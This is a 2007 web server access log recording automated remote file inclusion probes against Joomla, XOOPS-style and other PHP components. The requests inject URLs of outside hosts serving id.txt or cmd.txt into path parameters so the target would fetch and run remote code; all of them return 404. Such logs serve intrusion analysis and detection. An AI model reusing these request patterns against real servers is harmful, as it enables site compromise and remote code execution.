62.68.208.203 - - [16/Dec/2007:16:20:11 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.68.208.203 - - [16/Dec/2007:16:20:12 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:20:19 -0800] "GET /logs/access_070716.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:20:20 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:20:20 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:20:21 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:20:22 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
213.178.2.45 - - [16/Dec/2007:16:20:22 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
213.178.2.45 - - [16/Dec/2007:16:20:24 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
213.178.2.45 - - [16/Dec/2007:16:20:25 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:20:26 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:20:27 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:20:30 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:20:33 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.157.188.68 - - [16/Dec/2007:16:20:36 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
213.157.188.68 - - [16/Dec/2007:16:20:37 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
62.193.192.58 - - [16/Dec/2007:16:20:39 -0800] "GET /logs/access_070618.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:20:45 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.157.188.68 - - [16/Dec/2007:16:20:47 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
213.157.188.68 - - [16/Dec/2007:16:20:48 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:20:49 -0800] "GET /logs/access_071022.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:20:49 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:20:49 -0800] "GET ///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:20:50 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.157.188.68 - - [16/Dec/2007:16:20:53 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
213.157.188.68 - - [16/Dec/2007:16:20:54 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:20:56 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:20:57 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:20:58 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:20:58 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:20:59 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:20:59 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:21:15 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:21:15 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:21:16 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:21:16 -0800] "GET /logs/access_071022.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:21:16 -0800] "GET ///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:21:16 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:21:17 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
87.238.198.71 - - [16/Dec/2007:16:21:18 -0800] "GET /logs/access_071022.log///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.238.198.71 - - [16/Dec/2007:16:21:18 -0800] "GET ///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:21:18 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
217.29.159.130 - - [16/Dec/2007:16:21:21 -0800] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.freewebs.com/back1337/xx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:21:21 -0800] "GET /logs///components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:21:23 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
217.29.159.130 - - [16/Dec/2007:16:21:24 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.freewebs.com/back1337/xx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.242.75.179 - - [16/Dec/2007:16:21:26 -0800] "GET /logs/access.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.242.75.179 - - [16/Dec/2007:16:21:26 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.242.75.179 - - [16/Dec/2007:16:21:27 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:21:28 -0800] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:21:28 -0800] "GET /logs/access_071028.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:21:28 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:21:28 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:21:29 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:21:43 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:21:49 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:21:50 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
209.172.49.109 - - [16/Dec/2007:16:21:57 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://adm-adserver.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:22:02 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:22:02 -0800] "GET /logs/access_070820.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:22:04 -0800] "GET /logs/access.log///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:22:04 -0800] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:22:05 -0800] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
87.238.198.71 - - [16/Dec/2007:16:22:05 -0800] "GET /logs/access.log///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:22:05 -0800] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:22:06 -0800] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:22:09 -0800] "GET /logs/access.log///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:22:09 -0800] "GET ///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:22:10 -0800] "GET /logs///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.178.2.45 - - [16/Dec/2007:16:22:17 -0800] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800"
87.126.31.108 - - [16/Dec/2007:16:22:33 -0800] "GET /logs/announcements.php?phpraid_dir=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.126.31.108 - - [16/Dec/2007:16:22:34 -0800] "GET /announcements.php?phpraid_dir=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.157.188.68 - - [16/Dec/2007:16:23:02 -0800] "GET /logs/access_071105.log//classes/adodbt/sql.php?classes_dir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
213.157.188.68 - - [16/Dec/2007:16:23:02 -0800] "GET //classes/adodbt/sql.php?classes_dir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63"
213.157.188.68 - - [16/Dec/2007:16:23:03 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.yufa.spb.ru/modules/coppermine/include/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
125.248.143.12 - - [16/Dec/2007:16:23:06 -0800] "GET /logs/access_071029.log/login.php?includedir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
125.248.143.12 - - [16/Dec/2007:16:23:07 -0800] "GET /login.php?includedir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
125.248.143.12 - - [16/Dec/2007:16:23:08 -0800] "GET /logs/login.php?includedir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
125.248.143.12 - - [16/Dec/2007:16:23:22 -0800] "GET /logs/access_070702.log/login.php?includedir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.189.224.2 - - [16/Dec/2007:16:23:40 -0800] "GET /logs/access_070827.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.189.224.2 - - [16/Dec/2007:16:23:41 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.67.51 - - [16/Dec/2007:16:23:41 -0800] "GET /logs/access_071014.log/test.php?page=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.67.51 - - [16/Dec/2007:16:23:42 -0800] "GET /test.php?page=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.189.224.2 - - [16/Dec/2007:16:23:42 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.67.51 - - [16/Dec/2007:16:23:42 -0800] "GET /logs/test.php?page=http://xredrum.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:23:57 -0800] "GET /logs/access_071015.log///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.239.141.6 - - [16/Dec/2007:16:24:01 -0800] "GET /logs///components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.aquadawg.com//joomla2/gallery/modules/digibug/templates/files/mic1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.141.6 - - [16/Dec/2007:16:24:01 -0800] "GET ///components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.aquadawg.com//joomla2/gallery/modules/digibug/templates/files/mic1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:24:13 -0800] "GET /logs/access_071015.log///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.238.198.71 - - [16/Dec/2007:16:24:14 -0800] "GET /logs/access_071015.log///components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://trimedia-online.net/ihmank/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.66.32.14 - - [16/Dec/2007:16:24:22 -0800] "GET /logs/announcements.php?phpraid_dir=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.66.32.14 - - [16/Dec/2007:16:24:22 -0800] "GET /announcements.php?phpraid_dir=http://capodorso.com/accounts/inc/brazil667.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:24:24 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.246.51 - - [16/Dec/2007:16:24:24 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://myspacebill.com/myspacebill/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
122.153.16.5 - - [16/Dec/2007:16:24:42 -0800] "GET /logs/access_071029.log/login.php?includedir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.153.16.5 - - [16/Dec/2007:16:24:42 -0800] "GET /login.php?includedir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.153.16.5 - - [16/Dec/2007:16:24:43 -0800] "GET /logs/login.php?includedir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.242.75.179 - - [16/Dec/2007:16:24:47 -0800] "GET /logs/access_071022.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
122.153.16.5 - - [16/Dec/2007:16:24:52 -0800] "GET /logs/access_070702.log/login.php?includedir=http://www.emabe.com/administrator/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.68.208.203 - - [16/Dec/2007:16:24:53 -0800] "GET /logs/access_071022.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.111.173.115 - - [16/Dec/2007:16:25:22 -0800] "GET /logs/access_071029.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://northsidepoker.com/images/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.141.149 - - [16/Dec/2007:16:25:40 -0800] "GET /logs/!scanhttp://www.auctionsbycooper.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [16/Dec/2007:16:25:40 -0800] "GET /logs/!scan? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [16/Dec/2007:16:25:40 -0800] "GET /logs/!scan? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [16/Dec/2007:16:25:40 -0800] "GET /logs/!scan? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [16/Dec/2007:16:25:40 -0800] "GET /logs/!scan? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [16/Dec/2007:16:25:40 -0800] "GET /logs/!scan? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [16/Dec/2007:16:25:41 -0800] "GET /logs/!scan? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [16/Dec/2007:16:25:41 -0800] "GET /logs/!scan? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [16/Dec/2007:16:25:41 -0800] "GET /!scanhttp://www.auctionsbycooper.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [16/Dec/2007:16:25:41 -0800] "GET /!scan? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [16/Dec/2007:16:25:41 -0800] "GET /!scan? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [16/Dec/2007:16:25:41 -0800] "GET /!scan? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [16/Dec/2007:16:25:41 -0800] "GET /!scan? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [16/Dec/2007:16:25:41 -0800] "GET /!scan? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [16/Dec/2007:16:25:42 -0800] "GET /!scan? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.141.149 - - [16/Dec/2007:16:25:42 -0800] "GET /!scan? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.242.75.179 - - [16/Dec/2007:16:25:52 -0800] "GET /logs/access_071022.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.239.141.6 - - [16/Dec/2007:16:26:07 -0800] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.aquadawg.com//joomla2/gallery/modules/digibug/templates/files/mic1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
